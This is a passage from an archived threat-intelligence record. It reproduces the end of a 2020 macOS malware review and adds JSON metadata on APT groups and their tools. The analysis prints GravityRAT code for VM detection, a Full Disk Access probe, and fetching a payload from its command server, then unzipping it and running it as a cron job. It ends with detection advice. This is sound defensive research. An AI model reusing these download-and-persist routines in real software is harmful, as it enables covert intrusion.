$ system_profiler SPHardwareDataType | grep 'Model Identifier'
      Model Identifier: VMware7,1

$ system_profiler SPHardwareDataType | grep 'ROM'
      Boot ROM Version: VMW71.00V.16221537.B64.2005150253
      Apple ROM Info: [MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
      Welcome to the Virtual Machine

…thus the malware will be able to detect it’s running within a virtual machine …and display an error message:

function VMCheck(stdout) {

    ...

    const options = {
        type: 'question',
        buttons: ['Ok'],
        defaultId: 2,
        title: 'StrongBOX - Operation Not Permitted',
        message: 'Oops!! Something went wrong. ',
        detail: 'Please check your internet connection and try again.'
    };

    dialog.showMessageBox(null, options, (response, checkboxChecked) => {
        app.quit();
        app.exit();
    });
});

However, it appears that perhaps there is a bug in the malware’s code, and an incorrect error message will be displayed … “Please check your internet connection and try again.”:

[Figure: (incorrect) Error Message]

The main.js file also contains logic for a simple “is connected” check.
Often malware performs such checks to ensure it can communicate with a remote command and control server, and/or to detect if it is perhaps executing on an offline analysis system.

To ascertain if it’s running on an Internet-connected system, the malware invokes a function named connection which simply attempts to ping www.google.com:

function connection(){
    execRoot('ping -t 4 www.google.com', function(error, stdout, stderr){
        if(error || error !== null){
            const options = {
                type: 'question',
                buttons: ['Ok'],
                defaultId: 2,
                title: 'Internet Connectivity Required',
                message: 'Action Required',
                detail: "Sorry! Please check your internet connectivity and try again."
            };

            dialog.showMessageBox(null, options, (response, checkboxChecked) => {
                app.quit();
                app.exit();
            });

        } });
}

Via our Process Monitor, we can observe this execution of the ping command:

# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty
...
{
  "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
  "process" : {
    "uid" : 501,
    "arguments" : [
      "ping",
      "-t",
      "4",
      "www.google.com"
    ],
    "ppid" : 1447,
    "ancestors" : [
      1447,
      1
    ],
    "path" : "/sbin/ping",
    ...
  }
}

Lastly the main.js file checks if the malware has been granted Full Disk Access (FDA).

On recent versions of macOS, applications are prevented from accessing various user/system files, unless the user has manually granted the application “Full Disk Access” (via the System Preferences application). As such, malware that desires indiscriminate file system access may attempt to coerce users into granting such access.

In order to check if it has Full Disk Access, GravityRAT attempts to list the files in ~/Library/Safari.
As this directory is inaccessible to applications without FDA, this is a sufficient check. If the malware determines it does not have FDA, it will prompt the user to grant such access:

var ressslt = execRoot('ls ~/Library/Safari', function(err, data, stderr){

    if(!data || data =="")
    {
        const options = {
            type: 'question',
            buttons: ['Ok'],
            defaultId: 2,
            title: 'StrongBox - Operation Not Permitted',
            message: 'Action Required',
            detail: "Please follow the instructions to resolve this issue\nSystem Preferences -> Security & Privacy -> Full Disk Access to Terminal.app"
        };

        dialog.showMessageBox(null, options, (response, checkboxChecked) => {
            app.quit();
            app.exit();
        });

    } });
}

In the StrongBox sample, while the main.js file contains logic related to environmental checks (i.e. VM & FDA checks), the core of the malicious logic appears in the signature.js file.
As such, let’s now dive into the signature.js file.\r\nAt the start of the signature.js file we find various variables being initialized:\r\nvar srur = 'https://download.strongbox.in/strongbox/';\r\nvar srdr = 'https://download.strongbox.in/A0B74607.php';\r\nvar loclpth = path.join(app1.getPath('appData'), '/SCloud');\r\nThese variables appear to hold the malware’s command and control server (URLs) and a directory path, found within the user\r\napplication data directory (that we’ll see is used for persistence).\r\nThe malware’s server, download.strongbox.in, now appears to be offline:\r\n$ nslookup download.strongbox.in\r\nServer: 8.8.8.8\r\nAddress: 8.8.8.8#53\r\n** server can’t find download.strongbox.in: SERVFAIL\r\nThe code snippet, getPath(‘appData’), will return the “Per-user application data directory”, which on macOS\r\npoints to ~/Library/Application Support.\r\nIf needed, the malware will then create the directory specified in the loclpth variable ( ~/Library/Application\r\nSupport/SCloud ):\r\nif (!fs.existsSync(loclpth)){\r\n  fs.mkdirSync(loclpth,0700);\r\n}\r\nFurther down in the signature.js file, we can see the malware invoking a function named updates via the\r\nsetInterval API:\r\nsetInterval(updates,180000)\r\nAs its name implies, the updates function will download a file (an “update”) from the server specified in the srdr\r\nvariable ( https://download.strongbox.in/A0B74607.php ):\r\nfunction updates()\r\n{\r\n  const insst = axios.create();\r\n  var hash = store.get('Hash')\r\n  axios.post(srdr, {\r\n    value: 'update',\r\n    hash: hash\r\n  })\r\n  .then((response) =\u003e {\r\n    var respns = response.data;\r\n    if(respns){\r\n      var rply = respns.split('#');\r\n      var fname = rply[0].trim();\r\n      var agentTask = rply[1];\r\n    }\r\n\r\n    ...\r\n\r\n    var dpath;\r\n    if(osvar.trim()==\"darwin\")\r\n    var file = fs.createWriteStream(dpath);\r\n    var request = https.get(srur+'Updates/' + fname, function(response) {\r\n      response.pipe(file);\r\n      file.on('finish', function() {\r\n        getDateTime();\r\n        extractzip1(fname,agentTask);\r\n        file.close();\r\n      });\r\n\r\n    ...\r\n}\r\nIf this remote server ( https://download.strongbox.in/A0B74607.php ) provides a payload for download, the\r\nmalware will then invoke the extractzip1 function:\r\nfunction extractzip1(fname,agentTask)\r\n{\r\n\r\n  var source;\r\n  var sourceTozip;\r\n  if(osvar.trim()==\"darwin\") {\r\n    source = loclpth+\"/\"+fname;\r\n    sourceTozip = source+\".zip\";\r\n  }\r\n\r\n  ...\r\n  fs.rename(source, sourceTozip, function(err) {\r\n\r\n  });\r\n\r\n\r\n  if(osvar.trim()==\"darwin\") {\r\n    var extract = require('extract-zip')\r\n    var target= loclpth;\r\n    extract(sourceTozip, {dir: target}, function (err) {\r\n\r\n      ...\r\n      scheduleMac(fname,agentTask);\r\n    }\r\n    });\r\n  }\r\n}\r\nAfter appending .zip , the malware extracts the downloaded (zip) file to the location specified in the loclpth\r\nvariable ( ~/Library/Application Support/SCloud ). Once extracted, it invokes a function we discussed earlier,\r\nscheduleMac, which persists (as a cron job) and launches the downloaded payload.\r\nUnfortunately the remote servers (e.g. download.strongbox.in ) are now offline, and as such, the second-stage\r\npayloads are not available for analysis.\r\n👾 And All Others\r\nThis blog post provided a comprehensive technical analysis of the new Mac malware of 2020. However, it did not\r\ncover adware, or malware from previous years.\r\n
Of course, this is not to say such items are unimportant …\r\nespecially when such adware is notarized (to bypass Apple’s new security checks), or when existing malware is\r\nupdated.\r\nAs such, here we include a list (and links to detailed writeups) of other notable items from 2020, for the interested\r\nreader.\r\n👾 Shlayer / Vindinstaller Dropper\r\nIn June, Intego researchers uncovered:\r\n\"...a new [adware dropper] in the wild, actively spreading through malicious results in Google\r\nsearches.\r\nIntego identifies the [adware dropper] as unique new variants of OSX/Shlayer (the original\r\nvariant of which was first discovered by Intego in 2018) and OSX/Bundlore (with similarities to\r\npast versions of OSX/MacOffers and Mughthesec/BundleMeUp/Adload)\" -Intego\r\nAdware Dropper (credit: Intego)\r\nWriteup(s):\r\n  “New Mac malware reveals Google searches can be unsafe”\r\n  “How a New macOS Malware Dropper Delivers VindInstaller Adware”\r\n👾 OSX.GMERA (new campaign)\r\nIn July, ESET researchers lured GMERA malware operators “to remotely control their Mac honeypots”.\r\n\"To learn more about the intentions of this group, we set up honeypots where we monitored all\r\ninteractions between the GMERA reverse shell backdoors and the operators of this malware.\" -\r\nESET\r\nGMERA (run.sh) (credit: ESET)\r\nWe covered OSX.GMERA in our “Mac malware of 2019 report”, although the ESET researchers’ report is\r\nnoteworthy (in the context of 2020), as they uncovered a new campaign leveraging this malware.\r\nWriteup:\r\n  “Mac cryptocurrency trading application rebranded, bundled with malware”\r\n👾 Notarized Adware\r\nIn August, Peter Dantini (@PokeCaptain) noticed that the website homebrew.sh (not to be confused with\r\nthe legitimate Homebrew website brew.sh) was hosting an active adware campaign\r\n…and that the adware had been notarized (read: approved) by Apple:\r\nNotarized Adware\r\nThis means even on Big Sur, the adware will (still) be allowed to run!\r\nIn Apple’s own words, notarization was supposed to “give users more confidence that [software] …has\r\nbeen checked by Apple for malicious components.” …maybe not?\r\nWriteup:\r\n  “Apple Approved Malware”\r\n👾 Bundlore Dropper\r\nIn November, SentinelOne researchers published a report on an adware installer that (ab)used resource\r\nforks to store its malicious payloads.\r\n…the adware installer also provided user instructions to “bypass” macOS’s latest malware mitigations (e.g.\r\nnotarization):\r\nAdware Dropper (credit: SentinelOne)\r\nWriteup:\r\n  “Resourceful macOS Malware Hides in Named Fork”\r\n👾 OSX.OceanLotus (new variant)\r\nAlso in November, TrendMicro researchers discovered a backdoor that they tied to the OceanLotus Group.\r\nUpon closer analysis, the application (which masquerades as an Office document) appears to be an updated\r\nvariant of OSX.OceanLotus.F :\r\n\"Due to similarities in dynamic behavior and code with previous OceanLotus samples, it was\r\nconfirmed to be a variant of the said malware [OSX.OceanLotus.F]\" -TrendMicro\r\nOceanLotus (credit: TrendMicro)\r\nWriteup:\r\n  “New MacOS Backdoor Connected to OceanLotus Surfaces”\r\nDetections\r\nNew malware is notoriously difficult to detect via traditional signature-based approaches …as, well, it’s new! A\r\nfar better approach is to leverage heuristics or behaviors that can detect such malware, even with no a priori\r\nknowledge of the specific (new) threats.\r\nFor example, imagine you open an Office document that (unbeknownst to you) contains an exploit or malicious\r\nmacros which install a persistent backdoor.\r\n
This is clearly unusual behavior that should be detected and\r\nalerted upon.\r\nGood news: our free macOS security tools do not rely on signatures, but instead monitor for such (unusual, and\r\nlikely malicious) behaviors. This allows them to detect and alert on various behaviors of all the new malware of\r\n2020 (with no prior knowledge of the malware).\r\nFor example, let’s look at how OSX.Dacls is detected by our free tools:\r\nBlockBlock readily detects the malware’s attempt to persist as a launch item ( com.aex-loop.agent.plist → ~/Library/.mina ):\r\nLuLu detects the malware’s unauthorized network communications to the attackers’ remote command \u0026\r\ncontrol server ( ~/Library/.mina → 67.43.239.146 ):\r\nKnockKnock can scan a system and generically determine if it is infected with OSX.Dacls , by detecting its launch\r\nitem persistence ( com.aex-loop.agent.plist → ~/Library/.mina ):\r\nRecall that OSX.EvilQuest would ransom a user’s files. Well, good news: our RansomWhere? utility could both\r\ndetect and stop this malicious behavior in its tracks:\r\nThe other new malware samples are similarly detected when they persist, generate an unauthorized network\r\nconnection, or perform other malicious actions.\r\nConclusion:\r\nWell that’s a wrap! Thanks for joining our “journey” as we wandered through the macOS malware of 2020.\r\nWith the continued growth and popularity of macOS (especially in the enterprise!), 2021 will surely bring a bevy\r\nof new macOS malware.\r\n…so, stay safe out there!\r\nAnd if you’d like to learn more about macOS malware and malware analysis techniques, I’ve written an entire\r\n(free) book on this very topic:\r\n📚 The Art Of Mac Malware, Vol. 0x1: Analysis\r\nLove these blog posts?\r\nSupport my tools \u0026 writing on patreon :)\r\nSource: https://objective-see.com/blog/blog_0x5F.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x5F.html"
	],
	"report_names": [
		"blog_0x5F.html"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434394,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.pdf",
		"text": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.txt",
		"img": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.jpg"
	}
}